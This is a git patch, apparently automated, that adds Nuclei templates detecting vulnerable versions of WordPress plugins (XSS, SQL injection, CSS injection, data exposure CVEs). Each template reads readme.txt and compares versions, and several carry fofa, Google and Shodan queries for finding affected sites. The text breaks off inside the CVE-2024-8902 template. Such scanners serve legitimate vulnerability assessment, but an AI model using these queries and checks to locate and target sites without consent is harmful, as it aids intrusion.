From 72b45937419871baf01a0fee8002402be28d707d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 13 Oct 2024 12:37:43 +0000 Subject: [PATCH] 20241013 --- date.txt | 2 +- poc.txt | 34 +++++++++++ poc/cve/CVE-2024-7489.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8492.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8493.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8619.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8757.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8760.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8902.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8915.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9047.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9187.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9592.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9595.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9656.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9670.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9696.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9704.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9756.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9776.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9778.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9821.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9824.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9860.yaml | 59 +++++++++++++++++++ poc/cve/cve-2016-7981-2814.yaml | 5 ++ poc/cve/cve-2019-16920.yaml | 59 +++++++++++++++++++ poc/header/host-header-injection_.yaml | 32 ++++++++++ poc/injection/host-header-injection_.yaml | 32 ++++++++++ poc/other/2d-tag-cloud-widget-by-sujin.yaml | 59 +++++++++++++++++++ poc/other/category-icon.yaml | 59 +++++++++++++++++++ poc/other/image-gallery.yaml | 59 +++++++++++++++++++ poc/other/mynx-page-builder.yaml | 59 +++++++++++++++++++ poc/other/paypal-gift-certificate.yaml | 59 +++++++++++++++++++ .../bot-for-telegram-on-woocommerce.yaml | 59 +++++++++++++++++++ .../order-attachments-for-woocommerce.yaml | 59 +++++++++++++++++++ poc/social/dvk-social-sharing.yaml | 59 +++++++++++++++++++ poc/ssrf/ssrf-detect.yaml | 21 +++++++ 37 files changed, 1954 insertions(+), 1 deletion(-) create mode 100644 poc/cve/CVE-2024-7489.yaml create mode 100644 poc/cve/CVE-2024-8492.yaml create mode 100644 poc/cve/CVE-2024-8493.yaml create mode 100644 poc/cve/CVE-2024-8619.yaml create mode 100644 poc/cve/CVE-2024-8757.yaml create mode 100644 poc/cve/CVE-2024-8760.yaml create mode 100644 poc/cve/CVE-2024-8902.yaml create mode 100644 poc/cve/CVE-2024-8915.yaml create mode 100644 poc/cve/CVE-2024-9047.yaml create mode 100644 poc/cve/CVE-2024-9187.yaml create mode 100644 poc/cve/CVE-2024-9592.yaml create mode 100644 poc/cve/CVE-2024-9595.yaml create mode 100644 poc/cve/CVE-2024-9656.yaml create mode 100644 poc/cve/CVE-2024-9670.yaml create mode 100644 poc/cve/CVE-2024-9696.yaml create mode 100644 poc/cve/CVE-2024-9704.yaml create mode 100644 poc/cve/CVE-2024-9756.yaml create mode 100644 poc/cve/CVE-2024-9776.yaml create mode 100644 poc/cve/CVE-2024-9778.yaml create mode 100644 poc/cve/CVE-2024-9821.yaml create mode 100644 poc/cve/CVE-2024-9824.yaml create mode 100644 poc/cve/CVE-2024-9860.yaml create mode 100644 poc/cve/cve-2019-16920.yaml create mode 100644 poc/header/host-header-injection_.yaml create mode 100644 poc/injection/host-header-injection_.yaml create mode 100644 poc/other/2d-tag-cloud-widget-by-sujin.yaml create mode 100644 poc/other/category-icon.yaml create mode 100644 poc/other/image-gallery.yaml create mode 100644 poc/other/mynx-page-builder.yaml create mode 100644 poc/other/paypal-gift-certificate.yaml create mode 100644 poc/remote_code_execution/bot-for-telegram-on-woocommerce.yaml create mode 100644 poc/remote_code_execution/order-attachments-for-woocommerce.yaml create mode 100644 poc/social/dvk-social-sharing.yaml create mode 100644 poc/ssrf/ssrf-detect.yaml diff --git a/date.txt b/date.txt index 4c61f9c24a..dcf1ca303e 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241012 +20241013 diff --git a/poc.txt b/poc.txt index 83a8951653..5937b875d6 100644 --- a/poc.txt +++ b/poc.txt @@ -43295,6 +43295,7 @@ ./poc/cve/CVE-2024-7486-4944a37a1f08a4c0f808d31cb701abc0.yaml ./poc/cve/CVE-2024-7486.yaml ./poc/cve/CVE-2024-7489-aa8f1735fc553f9668252fa41454f24d.yaml +./poc/cve/CVE-2024-7489.yaml ./poc/cve/CVE-2024-7491-57292cedf3ffe8a05f22b0a34a93f1e7.yaml ./poc/cve/CVE-2024-7491.yaml ./poc/cve/CVE-2024-7492-2a27ab15f61a26513636485e06679756.yaml @@ -43693,7 +43694,9 @@ ./poc/cve/CVE-2024-8490-248af65f72b1c2b0295c9ea833e7478d.yaml ./poc/cve/CVE-2024-8490.yaml ./poc/cve/CVE-2024-8492-94675fec1abc838fe0b6b303f8fc36d8.yaml +./poc/cve/CVE-2024-8492.yaml ./poc/cve/CVE-2024-8493-187c32b4472ed4bbe2ad3f6482869576.yaml +./poc/cve/CVE-2024-8493.yaml ./poc/cve/CVE-2024-8499-c9a5372eb2c0d1af0e98c1a128e1ba17.yaml ./poc/cve/CVE-2024-8499.yaml ./poc/cve/CVE-2024-8505-83a08aab53494aec2ab7878bf97aab78.yaml @@ -43734,6 +43737,7 @@ ./poc/cve/CVE-2024-8552-3fed4d10e5322d73ee0e8c653106a656.yaml ./poc/cve/CVE-2024-8552.yaml ./poc/cve/CVE-2024-8619-68e42e392b92a31acf5085fd0331fe98.yaml +./poc/cve/CVE-2024-8619.yaml ./poc/cve/CVE-2024-8621-7d60a8cdcf557152f36b470b1896351c.yaml ./poc/cve/CVE-2024-8621.yaml ./poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml @@ -43834,9 +43838,11 @@ ./poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml ./poc/cve/CVE-2024-8747.yaml ./poc/cve/CVE-2024-8757-234bd8d60a5f32f1b24409ba56f236a6.yaml +./poc/cve/CVE-2024-8757.yaml ./poc/cve/CVE-2024-8758-b4b201de72ae2112a1088c6a9330f891.yaml ./poc/cve/CVE-2024-8758.yaml ./poc/cve/CVE-2024-8760-97bda91e9d60d0f1065494ed99fe53b7.yaml +./poc/cve/CVE-2024-8760.yaml ./poc/cve/CVE-2024-8761-c4b3560e76a2e821342571d2f628840d.yaml ./poc/cve/CVE-2024-8761.yaml ./poc/cve/CVE-2024-8771-56576a1d647813c40294e7136a5f117c.yaml @@ -43879,6 +43885,7 @@ ./poc/cve/CVE-2024-8872-af9dba20c77deb90e6dc21e6e1a04408.yaml ./poc/cve/CVE-2024-8872.yaml ./poc/cve/CVE-2024-8902-973a09e850f27d16cf400f1ff83278bd.yaml +./poc/cve/CVE-2024-8902.yaml ./poc/cve/CVE-2024-8910-a21139e5574bbe79da0b0184ae2f61a0.yaml ./poc/cve/CVE-2024-8910.yaml ./poc/cve/CVE-2024-8911-4f15541bff60904dde80229d21bf76b6.yaml @@ -43888,6 +43895,7 @@ ./poc/cve/CVE-2024-8914-a880cd2d5e4d4bdbe19c9508e28fe443.yaml ./poc/cve/CVE-2024-8914.yaml ./poc/cve/CVE-2024-8915-c96fbadd6669597791ff972bbeeaf8cd.yaml +./poc/cve/CVE-2024-8915.yaml ./poc/cve/CVE-2024-8917-6aaaaa729e35997797a61f2cd09b6335.yaml ./poc/cve/CVE-2024-8917.yaml ./poc/cve/CVE-2024-8919-fb0057a26cabecd9dfc880674f08a19a.yaml @@ -43928,6 +43936,7 @@ ./poc/cve/CVE-2024-9028-dc0d91d4955ed06391d200994359ce87.yaml ./poc/cve/CVE-2024-9028.yaml ./poc/cve/CVE-2024-9047-4fa9dae40fda722965808b936ffa6acb.yaml +./poc/cve/CVE-2024-9047.yaml ./poc/cve/CVE-2024-9049-0c91c2c9811f2f85c273c97777dda20b.yaml ./poc/cve/CVE-2024-9049.yaml ./poc/cve/CVE-2024-9051-d0cc990c4c2c72b3f1c15bf197875f13.yaml @@ -43987,6 +43996,7 @@ ./poc/cve/CVE-2024-9177-178dee7653fa8d80dc1711bad3dcec51.yaml ./poc/cve/CVE-2024-9177.yaml ./poc/cve/CVE-2024-9187-8b43f9d2f6a2b591d59c81d2238caf51.yaml +./poc/cve/CVE-2024-9187.yaml ./poc/cve/CVE-2024-9189-887572e2c273c4a4bdeea21969a91124.yaml ./poc/cve/CVE-2024-9189.yaml ./poc/cve/CVE-2024-9204-0c84a13d3a82918c5d6c0973f90aa654.yaml @@ -44116,7 +44126,9 @@ ./poc/cve/CVE-2024-9587-9addb86845d8c338383a9caf97ac21e2.yaml ./poc/cve/CVE-2024-9587.yaml ./poc/cve/CVE-2024-9592-fff4a8a541e39d94b5f0980d29acdfe3.yaml +./poc/cve/CVE-2024-9592.yaml ./poc/cve/CVE-2024-9595-0c12058c023c26b1446aa326839994fd.yaml +./poc/cve/CVE-2024-9595.yaml ./poc/cve/CVE-2024-9610-22573cea45a3c22fba477c8e4bf581f3.yaml ./poc/cve/CVE-2024-9610.yaml ./poc/cve/CVE-2024-9611-e3d072056298fd4e81d4dfecee6ae07e.yaml @@ -44124,21 +44136,31 @@ ./poc/cve/CVE-2024-9616-74cbb74314a998222d17f0108bdd1b47.yaml ./poc/cve/CVE-2024-9616.yaml ./poc/cve/CVE-2024-9656-5e11b0669cd68a7b45a069c732842ecd.yaml +./poc/cve/CVE-2024-9656.yaml ./poc/cve/CVE-2024-9670-590d40c02bbb47b092deffa0e1d25829.yaml +./poc/cve/CVE-2024-9670.yaml ./poc/cve/CVE-2024-9685-162e285486f85718f1eff0c9fc075030.yaml ./poc/cve/CVE-2024-9685.yaml ./poc/cve/CVE-2024-9696-7eb3ceca660ff8ed51fe8b0a6a2f165c.yaml +./poc/cve/CVE-2024-9696.yaml ./poc/cve/CVE-2024-9704-f21a430d525f14c5222622c2499dbc1f.yaml +./poc/cve/CVE-2024-9704.yaml ./poc/cve/CVE-2024-9707-4fb16dfc3a442890f762f60d876d8c4d.yaml ./poc/cve/CVE-2024-9707.yaml ./poc/cve/CVE-2024-9756-64a408f630e792f3ff717cc9822672de.yaml +./poc/cve/CVE-2024-9756.yaml ./poc/cve/CVE-2024-9776-b87b3db31f1eda93892f1d85c0aa0846.yaml +./poc/cve/CVE-2024-9776.yaml ./poc/cve/CVE-2024-9778-f12d8ad8d5a8b1346844c8509cb8d77c.yaml +./poc/cve/CVE-2024-9778.yaml ./poc/cve/CVE-2024-9821-3c976b43c465f64b4e1fa1afc3ed719b.yaml +./poc/cve/CVE-2024-9821.yaml ./poc/cve/CVE-2024-9822-69ea5c9c3890154ffaf61e4bd66bce90.yaml ./poc/cve/CVE-2024-9822.yaml ./poc/cve/CVE-2024-9824-44742b5dfe15bf136d8b10c8fdb6d6e7.yaml +./poc/cve/CVE-2024-9824.yaml ./poc/cve/CVE-2024-9860-b04ee97e5d460a289f93568831e0cf5e.yaml +./poc/cve/CVE-2024-9860.yaml ./poc/cve/CVE202127562-220331-222408.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml @@ -47648,6 +47670,7 @@ ./poc/cve/cve-2019-16920-3960.yaml ./poc/cve/cve-2019-16920-3961.yaml ./poc/cve/cve-2019-16920-3962.yaml +./poc/cve/cve-2019-16920.yaml ./poc/cve/cve-2019-16931(1).yaml ./poc/cve/cve-2019-16931-3963.yaml ./poc/cve/cve-2019-16931.yaml @@ -58101,6 +58124,7 @@ ./poc/header/host-header-injection-8001.yaml ./poc/header/host-header-injection-8002.yaml ./poc/header/host-header-injection.yaml +./poc/header/host-header-injection_.yaml ./poc/header/host-header-poisoning.yaml ./poc/header/hostheaderpoisoning.yaml ./poc/header/http-cache-header.yaml @@ -58531,6 +58555,7 @@ ./poc/injection/host-header-injection-8001.yaml ./poc/injection/host-header-injection-8002.yaml ./poc/injection/host-header-injection.yaml +./poc/injection/host-header-injection_.yaml ./poc/injection/injection-guard-4875992ccc89ab6c03d9298f0ea07338.yaml ./poc/injection/injection-guard-4a32f73a586451a52bc0604215b90d03.yaml ./poc/injection/injection-guard-55f31168b1f68836ada04260aaedb591.yaml @@ -63800,6 +63825,7 @@ ./poc/other/2848712183.yaml ./poc/other/2939021635.yaml ./poc/other/2d-tag-cloud-widget-by-sujin-f775dedf778f01d96f3cf104b4a5ff00.yaml +./poc/other/2d-tag-cloud-widget-by-sujin.yaml ./poc/other/2j-slideshow-398188b565cef4627bb1cc2005473d42.yaml ./poc/other/2j-slideshow-a2cb29fa8d73411375a9f25f28aec131.yaml ./poc/other/2j-slideshow-a7ee719525508426f77934740c1310d6.yaml @@ -69221,6 +69247,7 @@ ./poc/other/category-grid-view-gallery-ec1de78c58c23ac8308ebf650b24c84a.yaml ./poc/other/category-grid-view-gallery.yaml ./poc/other/category-icon-1ba7a71509a41771343e0fdcceeb4a9f.yaml +./poc/other/category-icon.yaml ./poc/other/category-list-portfolio-page-c3ec7120a4b92459e512233c50f2a028.yaml ./poc/other/category-list-portfolio-page.yaml ./poc/other/category-page-icons-02e0417d125f209136fe3c33ea09f1de.yaml @@ -78545,6 +78572,7 @@ ./poc/other/image-gallery-with-slideshow-72b9b91cc4acaa06a4eeec68b450f837.yaml ./poc/other/image-gallery-with-slideshow-d86316f172e2cc00097a0b5d6774c1b2.yaml ./poc/other/image-gallery-with-slideshow.yaml +./poc/other/image-gallery.yaml ./poc/other/image-horizontal-reel-scroll-slideshow-29d01eb4c98f0f4e9fcbd15dcac7b08c.yaml ./poc/other/image-horizontal-reel-scroll-slideshow-5f09e55636613e78488ea83c9a30f2be.yaml ./poc/other/image-horizontal-reel-scroll-slideshow.yaml @@ -83084,6 +83112,7 @@ ./poc/other/mylot.yaml ./poc/other/mymfans.yaml ./poc/other/mynx-page-builder-e5ef52784bd604a03534c96c5c5b985d.yaml +./poc/other/mynx-page-builder.yaml ./poc/other/mypixs-758377262af71e2390f649acd5c89b73.yaml ./poc/other/mypixs.yaml ./poc/other/myportfolio.yaml @@ -84848,6 +84877,7 @@ ./poc/other/paypal-donations-5eead37a379def1e3474abcddf3a225c.yaml ./poc/other/paypal-donations.yaml ./poc/other/paypal-gift-certificate-7a1c89e0233f23e5f8c8d08caace9488.yaml +./poc/other/paypal-gift-certificate.yaml ./poc/other/paypal-pay-buy-donation-and-cart-buttons-shortcode-055ed7df687e1bb906d206bc5dc26037.yaml ./poc/other/paypal-pay-buy-donation-and-cart-buttons-shortcode-b134b6aa0693a308331bb83085898e83.yaml ./poc/other/paypal-pay-buy-donation-and-cart-buttons-shortcode.yaml @@ -98417,6 +98447,7 @@ ./poc/remote_code_execution/bosa-elementor-for-woocommerce-01a4f2980d5d921fdb4f483338cf1391.yaml ./poc/remote_code_execution/bosa-elementor-for-woocommerce.yaml ./poc/remote_code_execution/bot-for-telegram-on-woocommerce-95e4471cf7b0cdfb6c9aec1a9d40a0ae.yaml +./poc/remote_code_execution/bot-for-telegram-on-woocommerce.yaml ./poc/remote_code_execution/brands-for-woocommerce-018c818356c6b000ed4656a96a0c372c.yaml ./poc/remote_code_execution/brands-for-woocommerce-055e1820b3e7ef430034aac2fbd3cb4b.yaml ./poc/remote_code_execution/brands-for-woocommerce-25f970a8a780b560ba186742cd55ae28.yaml @@ -99477,6 +99508,7 @@ ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-cb43a3033745f9235059b7d1b7a3d855.yaml ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce.yaml ./poc/remote_code_execution/order-attachments-for-woocommerce-d72cf819fcb5997a2922f8848f39656f.yaml +./poc/remote_code_execution/order-attachments-for-woocommerce.yaml ./poc/remote_code_execution/order-auto-complete-for-woocommerce-d52da6d8785fe0d333ad93221eb739c1.yaml ./poc/remote_code_execution/order-auto-complete-for-woocommerce.yaml ./poc/remote_code_execution/order-delivery-date-for-woocommerce-0a1e73557358a5b2fa4a31e0b34b7e12.yaml @@ -102768,6 +102800,7 @@ ./poc/social/duitku-social-payment-gateway-00bd2277c641ac0f8870ff39d1abb82f.yaml ./poc/social/duitku-social-payment-gateway.yaml ./poc/social/dvk-social-sharing-89c738e746dab8d430975f04439c54b6.yaml +./poc/social/dvk-social-sharing.yaml ./poc/social/easy-facebook-like-box-7f8f19fc7534d3a20291e7d36a6962a1.yaml ./poc/social/easy-facebook-like-box.yaml ./poc/social/easy-facebook-likebox-0351c9b7f28bf4dade309063cdc5cccc.yaml @@ -112221,6 +112254,7 @@ ./poc/ssrf/ssrf-blind-host.yaml ./poc/ssrf/ssrf-blind.yaml ./poc/ssrf/ssrf-by-proxy.yaml +./poc/ssrf/ssrf-detect.yaml ./poc/ssrf/ssrf-detection.yaml ./poc/ssrf/ssrf-fuzz.yaml ./poc/ssrf/ssrf-injection.yaml diff --git a/poc/cve/CVE-2024-7489.yaml b/poc/cve/CVE-2024-7489.yaml new file mode 100644 index 0000000000..d5ad65021c --- /dev/null +++ b/poc/cve/CVE-2024-7489.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7489 + +info: + name: > + Forms for Mailchimp by Optin Cat <= 2.5.6 - Authenticated (Editor+) Stored Cross-Site Scripting via Form Color Parameters + author: topscoder + severity: low + description: > + The Forms for Mailchimp by Optin Cat – Grow Your MailChimp List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form color parameters in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/52f9db86-7fed-4b32-8384-3ceb300f9249?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7489 + metadata: + fofa-query: "wp-content/plugins/mailchimp-wp/" + google-query: inurl:"/wp-content/plugins/mailchimp-wp/" + shodan-query: 'vuln:CVE-2024-7489' + tags: cve,wordpress,wp-plugin,mailchimp-wp,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mailchimp-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mailchimp-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8492.yaml b/poc/cve/CVE-2024-8492.yaml new file mode 100644 index 0000000000..779e62d7cb --- /dev/null +++ b/poc/cve/CVE-2024-8492.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8492 + +info: + name: > + Hustle <= 7.8.4 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 7.8.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d7023a3e-35ba-4d52-8092-ae40b53d5efa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-8492 + metadata: + fofa-query: "wp-content/plugins/wordpress-popup/" + google-query: inurl:"/wp-content/plugins/wordpress-popup/" + shodan-query: 'vuln:CVE-2024-8492' + tags: cve,wordpress,wp-plugin,wordpress-popup,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-popup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wordpress-popup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.8.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8493.yaml b/poc/cve/CVE-2024-8493.yaml new file mode 100644 index 0000000000..c5cff79575 --- /dev/null +++ b/poc/cve/CVE-2024-8493.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8493 + +info: + name: > + The Events Calendar <= 6.6.3 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The The Events Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6df29b14-0c9d-4ecf-96be-8c39c93121e2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-8493 + metadata: + fofa-query: "wp-content/plugins/the-events-calendar/" + google-query: inurl:"/wp-content/plugins/the-events-calendar/" + shodan-query: 'vuln:CVE-2024-8493' + tags: cve,wordpress,wp-plugin,the-events-calendar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "the-events-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.6.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8619.yaml b/poc/cve/CVE-2024-8619.yaml new file mode 100644 index 0000000000..69580c1ecf --- /dev/null +++ b/poc/cve/CVE-2024-8619.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8619 + +info: + name: > + Ajax Search Lite <= 4.12.1 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Ajax Search Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.12.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e1cc3dbe-26e3-478f-9574-f57ffa0f50c3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-8619 + metadata: + fofa-query: "wp-content/plugins/ajax-search-lite/" + google-query: inurl:"/wp-content/plugins/ajax-search-lite/" + shodan-query: 'vuln:CVE-2024-8619' + tags: cve,wordpress,wp-plugin,ajax-search-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ajax-search-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ajax-search-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.12.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8757.yaml b/poc/cve/CVE-2024-8757.yaml new file mode 100644 index 0000000000..0d5c3ae995 --- /dev/null +++ b/poc/cve/CVE-2024-8757.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8757 + +info: + name: > + Boost Your Blog's Engagement with WP Post Author <= 3.8.1 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + The WP Post Author – Boost Your Blog's Engagement with Author Box, Social Links, Co-Authors, Guest Authors, Post Rating System, and Custom User Registration Form Builder plugin for WordPress is vulnerable to time-based SQL Injection via the linked_user_id parameter in all versions up to, and including, 3.8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d667bafc-5f19-4889-a988-236df050c013?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-8757 + metadata: + fofa-query: "wp-content/plugins/wp-post-author/" + google-query: inurl:"/wp-content/plugins/wp-post-author/" + shodan-query: 'vuln:CVE-2024-8757' + tags: cve,wordpress,wp-plugin,wp-post-author,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-post-author/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-post-author" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.8.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8760.yaml b/poc/cve/CVE-2024-8760.yaml new file mode 100644 index 0000000000..8cfe22870d --- /dev/null +++ b/poc/cve/CVE-2024-8760.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8760 + +info: + name: > + Stackable – Page Builder Gutenberg Blocks <= 3.13.6 - Unauthenticated CSS Injection + author: topscoder + severity: medium + description: > + The Stackable – Page Builder Gutenberg Blocks plugin for WordPress is vulnerable to CSS Injection in all versions up to, and including, 3.13.6. This makes it possible for unauthenticated attackers to embed untrusted style information into comments resulting in a possibility of data exfiltration such as admin nonces with limited impact. These nonces could be used to perform CSRF attacks within a limited time window. The presence of other plugins may make additional nonces available, which may pose a risk in plugins that don't perform capability checks to protect AJAX actions or other actions reachable by lower-privileged users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fd0b13c-7447-45da-9608-80b7629d9bbf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8760 + metadata: + fofa-query: "wp-content/plugins/stackable-ultimate-gutenberg-blocks/" + google-query: inurl:"/wp-content/plugins/stackable-ultimate-gutenberg-blocks/" + shodan-query: 'vuln:CVE-2024-8760' + tags: cve,wordpress,wp-plugin,stackable-ultimate-gutenberg-blocks,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/stackable-ultimate-gutenberg-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "stackable-ultimate-gutenberg-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.13.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8902.yaml b/poc/cve/CVE-2024-8902.yaml new file mode 100644 index 0000000000..f0a8f82297 --- /dev/null +++ b/poc/cve/CVE-2024-8902.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8902 + +info: + name: > + Elementor Addon Elements <= 1.13.8 - Authenticated (Contributor+) Sensitive Information Exposure via table_saved_sections + author: topscoder + severity: low + description: > + The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.8 via the render_column function in modules/data-table/widgets/data-table.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7317ecf5-d43d-4080-ad2a-7644764dd41e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8902 + metadata: + fofa-query: "wp-content/plugins/addon-elements-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/addon-elements-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-8902' 